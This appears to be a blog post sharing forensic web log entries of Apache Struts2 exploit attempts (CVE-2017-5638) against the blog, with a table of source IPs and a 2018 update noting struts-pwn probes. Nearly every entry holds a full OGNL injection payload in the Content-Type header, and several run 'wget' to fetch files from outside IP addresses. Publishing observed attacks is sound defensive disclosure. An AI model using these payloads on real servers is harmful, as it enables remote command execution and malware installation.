blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+10800:59856d66:8e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+9129:59a7931c:79|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+15241:59a9759d:61|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3ahttps://blog2.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+7914:59ba06d2:e9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#szgx='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo Aman4Wolves').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.close())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|Host:blog.cyberwar.nl

The requests were received from the following IPs:

AS      | IP               | AS Name
2875    | 159.93.36.250    | JINR-AS JINR/HEPNET, RU
4134    | 122.225.98.178   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 182.148.123.59   | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 218.94.37.42     | CHINANET-BACKBONE No.31,Jin-rong Street, CN
4134    | 220.191.231.222  | CHINANET-BACKBONE No.31,Jin-rong Street, CN
9381    | 223.255.145.158  | WTT-AS-AP WTT HK Limited, HK
18978   | 23.244.78.26     | ENZUINC-US - Enzu Inc, US
37963   | 114.215.47.133   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.27.240.44    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.76.41.162    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 120.77.179.38    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.41.72.189    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 121.42.147.64    | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
37963   | 123.57.148.247   | CNNIC-ALIBABA-CN-NET-AP Hangzhou Alibaba Advertising Co.,Ltd., CN
59019   | 120.92.84.17     | BJKSCNET Beijing Kingsoft Cloud Internet Technology Co., Ltd, CN
134764  | 116.31.125.127   | CT-FOSHAN-IDC CHINANET Guangdong province network, CN

UPDATE 2018-02-10: more log entries in Feb 2018, first one listing struts-pwn, a tool to test systems for CVE-2017-5638 (and perform remote command execution), released 11 months ago):

blog.cyberwar.nl-forensic.log:+31342:5a36c21f:65|GET / HTTP/1.1|Host:149.210.129.7|Connection:keep-alive|Accept-Encoding:gzip, deflate|Accept:*/*|User-Agent:struts-pwn (https%3a//github.com/mazen160/struts-pwn)|Content-Type:%25{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('tokjuoq','tokjuoq')}.multipart/form-data
blog.cyberwar.nl-forensic.log:+536:5a7ee6a9:7d|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/ HTTP/1.1|User-Agent:Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36|referer:https%3ahttps://blog2.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/|Content-Type:%25%7B(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#matt= #context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.setContentType('text/plain'),#matt.getWriter().println ("c9fd5ad9-e018-4118-9b93-6ed84ee84121"),#matt.getWriter().flush(),#matt.getWriter().close())}|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive
blog.cyberwar.nl-forensic.log:+28292:5a7ee6a9:162|GET /2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%2523matt.setContentType('text/plain'),%2523matt.getWriter().println%2520('successsuccess'),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D HTTP/1.1|User-Agent:Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0|referer:https%3ahttps://blog2.cyberwar.nl/2015/09/dutch-lijstje-van-reacties-van-organisaties-op-de-wiv-consultatie/?redirect%3a$%257B%2523matt%253d%2520%2523context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%2523matt.setContentType(%27text/plain%27),%2523matt.getWriter().println%2520(%27successsuccess%27),%2523matt.getWriter().flush(),%2523matt.getWriter().close()%257D|Host:blog.cyberwar.nl|Accept:text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2|Connection:keep-alive

EOF